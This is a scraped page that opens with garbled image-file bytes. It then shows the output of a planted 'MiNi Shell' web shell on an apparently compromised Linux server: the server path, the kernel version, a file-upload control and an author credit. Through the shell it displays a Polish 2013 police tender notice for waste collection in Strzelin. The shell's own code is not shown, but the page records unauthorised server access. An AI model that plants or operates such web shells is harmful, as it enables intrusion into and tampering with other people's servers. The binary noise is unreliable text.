JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130109/5471-N-2013.html

<p class="kh_header"><b>Wrocław: Usługa wywozu niesegregowanych (zmieszanych) odpadów komunalnych z Komendy Powiatowej Policji w Strzelinie, ul. Wolności 15, 57-100 Strzelin</b><br>
<b>Numer ogłoszenia: 5471 - 2013; data zamieszczenia: 09.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji we Wrocławiu , ul Podwale 31-33, 50-040 Wrocław, woj. dolnośląskie, tel. (071) 340 38 00, faks (071) 782 41 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dolnoslaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wywozu niesegregowanych (zmieszanych) odpadów komunalnych z Komendy Powiatowej Policji w Strzelinie, ul. Wolności 15, 57-100 Strzelin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa wywozu niesegregowanych (zmieszanych) odpadów komunalnych z Komendy Powiatowej Policji w Strzelinie, ul. Wolności 15, 57-100 Strzelin.
1.1.	Odpadami stałymi w rozumieniu Zamawiającego są odpady powstałe w obiektach użyteczności publicznej i obsługi ludności, a także w pomieszczeniach użytkowanych na cele biurowe lub socjalne wytwarzającego odpady.
1.2.	Postępowanie nie obejmuje wywozu odpadów powstających w wyniku działalności produkcyjnej, budowlanej oraz złomu metali, a także odpadów szkodliwych dla środowiska i zagrażających zdrowiu i życiu ludzkiemu.
2.	W ramach zawartej umowy Wykonawca będzie zobowiązany do:
2.1.	Dostarczenia pojemników i kontenerów do gromadzenia odpadów, zgodnie z zamówieniem zamawiającego,
2.2.	Wymiany pojemników i kontenerów do gromadzenia odpadów na swój koszt, gdy zużycie ich następuje w wyniku normalnej eksploatacji lub z winy Wykonawcy w terminie 3 dni od daty zgłoszenia przez Zamawiającego,
2.3.	Wywożenia odpadów stałych z pojemników i kontenerów wg częstotliwości określonej w załączniku numer 1 do SIWZ oraz dniach tygodnia uzgodnionych z Zamawiającym,
2.4.	Uprzątnięciu odpadów luzem powstałych podczas ładowania, bądź w wyniku opóźnionego wywozu na własny koszt,
2.5.	Odstawiania pojemników i kontenerów opróżnionych na miejsca ich lokalizacji,
2.6.	Dostarczonej, poświadczonej za zgodność z oryginałem, kopii aktualnego zaświadczenia o wpisie do rejestru działalności regulowanej niezwłocznie po uzyskaniu przedmiotowego zaświadczenia.
3.	Kod i nazwa Wspólnego Słownika Zamówień (CPV): 
3.1.	90513200-8 Usługi wywozu stałych odpadów miejskich
4.	Zamawiający nie dopuszcza możliwości składania ofert częściowych. Wymaga się złożenia oferty obejmującej wywóz wskazanej przez Zamawiającego ilości odpadów w częstotliwości wskazanej przez Zamawiającego w załączniku numer 1 do SIWZ. 
5.	Dopuszczalność udziału podwykonawców: Wykonawca może powierzyć wykonanie części zamówienia (określonych prac bądź czynności) podwykonawcom, jednakże w takim przypadku Zamawiający wymaga wskazania w ofercie tych prac lub czynności..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Informacja o warunkach jakie muszą spełniać wykonawcy - opis warunków udziału w postępowaniu
1.1.	W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące: 
1.1.1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
1.1.2.	Posiadania wiedzy i doświadczenia.
1.1.3.	Dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
1.1.4.	Sytuacji finansowej i ekonomicznej.
Dla potwierdzenia spełniania warunków udziału w postępowaniu wykonawca winien złożyć oświadczenie - załącznik nr 3 do SIWZ.  
2.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.
W odniesieniu do warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający uzna warunek za spełniony, w przypadku, gdy wykonawca wykaże, że:
2.1.	Uzyskał wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez wójta gminy Oleśnica (właściwego ze względu na miejsce odbierania odpadów komunalnych) zgodnie z art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r., poz. 391 ze zm.)
Wykonawcy odbierający odpady komunalne od właścicieli nieruchomości, którzy w dniu wejścia w życie ustawy z dnia 1 lipca 2011 r. o zmianie ustawy o utrzymaniu czystości i porządku w gminach (dz. U. Nr 152, poz. 897 z późn. Zm.), tj. w dniu 1 stycznia 2012 r. posiadali zezwolenie na prowadzenie działalności gospodarczej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, mogą - zgodnie z art. 14 ust. 1 powołanej ustawy nowelizującej - wykazać spełnienie warunku udziału w postępowaniu również na podstawie tego zezwolenia, a w przypadku gminnych jednostek organizacyjnych prowadzących działalność na obszarze własnej gminy - udokumentowane zwolnienie zgodnie z ww. ustawą z obowiązku uzyskania przedmiotowego zezwolenia.
2.2.	Uzyskał zezwolenie na prowadzenie działalności w zakresie transportu odpadów zgodnie z art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 r. (Dz. U. 2001 Nr 62 poz. 628 ze zmianami) o odpadach lub udokumentowane zwolnienie z obowiązku posiadania takiego zezwolenia.
2.3.	Zamawiający dokona oceny spełnienia tego warunku udziału w postępowaniu metodą spełnia - nie spełnia, na podstawie złożonego oświadczenia - załącznik numer 3 do SIWZ oraz dokumentów wskazanych w punkcie 3.1. w Rozdziale VII SIWZ.
2.4.	Zamawiający nie dokonuje opisu warunków udziału w postępowaniu dotyczących posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, sytuacji finansowej i ekonomicznej. Zamawiający dokona oceny spełnienia tych warunków udziału w postępowaniu metodą spełnia - nie spełnia, na podstawie złożonego oświadczenia - załącznik numer 3 do SIWZ.
2.5.	W zakresie warunku dotyczącego niepodlegania wykluczeniu Zamawiający dokona oceny jego spełniania na podstawie złożonego oświadczenia - załącznik numer 4 do SIWZ. 
3.	Lista dokumentów potwierdzających brak podstaw do wykluczenia
Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ustawy, oraz w celu wykazania braku podstaw do wykluczenia przedstawienia wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. w sprawie rodzaju dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 poz. 1817) mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez  wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 
3.1.	W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, których opis sposobu oceny został dokonany w ogłoszeniu o zamówieniu i specyfikacji istotnych warunków zamówienia, Zamawiający żąda dołączenia do oferty następujących dokumentów: 
3.1.1.	Wpisu do rejestru działalności regulowanej w zakresie odbierania niesegregowanych odpadów komunalnych od właścicieli nieruchomości prowadzonego przez wójta gminy Strzelin (właściwego ze względu na miejsce odbierania odpadów komunalnych) zgodnie z art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r., poz. 391 ze zm.) lub aktualnego zezwolenia na prowadzenie działalności gospodarczej w zakresie odbierania niesegregowanych odpadów komunalnych od właścicieli nieruchomości albo udokumentowanego zwolnienia zgodnie z ww. ustawą z obowiązku uzyskania przedmiotowego zezwolenia
3.1.2.	Aktualnego zezwolenia na prowadzenie działalności w zakresie transportu niesegregowanych odpadów zgodnie z art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 r. (Dz. U. 2001 Nr 62 poz. 628 ze zmianami) o odpadach lub udokumentowanego zwolnienia z obowiązku posiadania takiego zezwolenia.
3.2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy, w okolicznościach, o których mowa w art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych Zamawiający żąda dołączenia do oferty następujących dokumentów: 
3.2.1.	Oświadczenia o braku podstaw do wykluczenia - załącznik numer 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.4.	Zamawiający nie dokonuje opisu warunków udziału w postępowaniu dotyczących posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, sytuacji finansowej i ekonomicznej. Zamawiający dokona oceny spełnienia tych warunków udziału w postępowaniu metodą spełnia - nie spełnia, na podstawie złożonego oświadczenia - załącznik numer 3 do SIWZ.
2.5.	W zakresie warunku dotyczącego niepodlegania wykluczeniu Zamawiający dokona oceny jego spełniania na podstawie złożonego oświadczenia - załącznik numer 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.4.	Zamawiający nie dokonuje opisu warunków udziału w postępowaniu dotyczących posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, sytuacji finansowej i ekonomicznej. Zamawiający dokona oceny spełnienia tych warunków udziału w postępowaniu metodą spełnia - nie spełnia, na podstawie złożonego oświadczenia - załącznik numer 3 do SIWZ.
2.5.	W zakresie warunku dotyczącego niepodlegania wykluczeniu Zamawiający dokona oceny jego spełniania na podstawie złożonego oświadczenia - załącznik numer 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.4.	Zamawiający nie dokonuje opisu warunków udziału w postępowaniu dotyczących posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, sytuacji finansowej i ekonomicznej. Zamawiający dokona oceny spełnienia tych warunków udziału w postępowaniu metodą spełnia - nie spełnia, na podstawie złożonego oświadczenia - załącznik numer 3 do SIWZ.
2.5.	W zakresie warunku dotyczącego niepodlegania wykluczeniu Zamawiający dokona oceny jego spełniania na podstawie złożonego oświadczenia - załącznik numer 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.4.	Zamawiający nie dokonuje opisu warunków udziału w postępowaniu dotyczących posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, sytuacji finansowej i ekonomicznej. Zamawiający dokona oceny spełnienia tych warunków udziału w postępowaniu metodą spełnia - nie spełnia, na podstawie złożonego oświadczenia - załącznik numer 3 do SIWZ.
2.5.	W zakresie warunku dotyczącego niepodlegania wykluczeniu Zamawiający dokona oceny jego spełniania na podstawie złożonego oświadczenia - załącznik numer 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełnione i podpisane formularz ofertowy (załącznik numer 5 do SIWZ) oraz specyfikację ilości zamawianych usług (załącznik numer 1 do SIWZ).
2.	Oświadczenia i dokumenty wymienione w Rozdziałach VI i VII SIWZ 
3.	W przypadku, gdy Wykonawca przewiduje udział podwykonawców w realizacji zamówienia: oświadczenie dotyczące udziału podwykonawców, którego wzór określa załącznik numer 6 do SIWZ.
4.	W przypadku wnoszenia oferty przez wspólników spółki cywilnej należy załączyć dodatkowo, gdy oferta nie jest podpisana przez wszystkich wspólników - pełnomocnictwo wspólników do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy podpisane przez wszystkich wspólników lub ich prawnie upoważnionych przedstawicieli. Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
5.	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum) 
5.1.	Na podstawie art. 23 ust. 2 ustawy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
5.2.	W związku z powyższym niezbędne jest przedłożenie w ofercie pełnomocnictwa ustanawiającego podmiot uprawniony (lidera) do występowania w imieniu konsorcjum, wraz z określeniem zakresu umocowania lidera  (pełnomocnictwo: do reprezentowania konsorcjum w prowadzonym postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy). Wymaga się, by pełnomocnictwo było podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów (konsorcjantów). Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
5.3.	Każdy z partnerów musi złożyć oświadczenie, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 Pzp (załącznik numer 4 do SIWZ). Wszystkie warunki udziału w postępowaniu, o których mowa w Rozdziale VII pkt. 1 partnerzy winni spełniać łącznie.
6.	Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba  że mimo, ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
7.	Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych nie dopuszcza się istotnych zmian postanowień zawartej
umowy w stosunku do treści oferty, na podstawie której dokonano wybory wykonawcy, chyba że zamawiający
przewidział możliwości dokonania zmiany w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków
zamówienia oraz określił warunki takiej zmiany, tj.: W § 3 istotnych postanowień umowy (załącznik nr 5 do SIWZ),
przewidziano następujące zmiany: 2. Zmiana cen dopuszczalna jest w przypadku zmiany opłat za składowanie
odpadów na wysypiskach odpadów komunalnych oraz za korzystanie ze środowiska wynikających z
Rozporządzenia Ministra Środowiska i Uchwały danego Samorządu Terytorialnego. Wzrost cen nie może być
większy niż wzrost stawki za daną usługę w ww. aktach prawnych. Zmiana cen dopuszczalna jest również w
przypadku zmiany wysokości podatku VAT za wywóz odpadów komunalnych. Zmiana opłat lub wysokość podatku skutkować będzie zmianą okresu wykonania usługi. 3. Zmiana cen, zmiana częstotliwości świadczenia usługi lub wielkości pojemnika na odpady komunalne wprowadzana będzie w formie pisemnego aneksu do umowy z co najmniej miesięcznym wyprzedzeniem. W § 6 istotnych postanowień umowy (załącznik nr 5 do SIWZ),
przewidziano następujące zmiany: 2. Zamawiający dopuszcza możliwość zmiany postanowień niniejszej umowy w następujących przypadkach: 2.1 W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie
umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 2.2 W przypadku o których mowa w §6 ust.2 pkt 2.1 Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy. 2.3 W przypadku zmiany lokalizacji jednostki organizacyjnej Policji w obrębie tej samej miejscowości umowa uwzględnia zmianę w zakresie adresu jednostki a Wykonawca będzie zobowiązany
świadczyć usługi na warunkach określonych w umowie 2.4 W przypadku zmiany powszechnie obowiązujących
przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub obowiązki jednej lub obu
stron umowa może zostać rozwiązana przez Zamawiającego w trybie natychmiastowym. 2.5 W przypadku
likwidacji jednostki organizacyjnej Policji lub ogłoszenia upadłości lub likwidacji Wykonawcy albo zaprzestania
świadczenia usług objętych umową, umowa zostanie rozwiązana. 2.6 W przypadku, gdy obie strony umowy
wyrażą na to zgodę możliwa jest zmiana okresu rozliczeniowego. 2.7 W przypadku zwiększonej ilości odpadów
komunalnych dopuszcza się w ramach umowy odpłatny dodatkowy wywóz odpadów. Usługa realizowana będzie
po uprzednim zgłoszeniu telefonicznym przez Zamawiającego. 2.8 W przypadku gdy obie strony umowy wyrażą na to zgodę umowa ulegnie zmianie w zakresie wskazanym w §3 niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dolnoslaska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji we Wrocławiu 
Wydział Zamówień Publicznych i Funduszy Pomocowych
ul. Podwale 31-33, 50-040 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2013 godzina 11:00, miejsce: Komenda Wojewódzka Policji we Wrocławiu Wydział Zamówień Publicznych i Funduszy Pomocowych kontakt przez Punkt Obsługi Klienta, ul. Podwale 31 - 33, 50-040 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com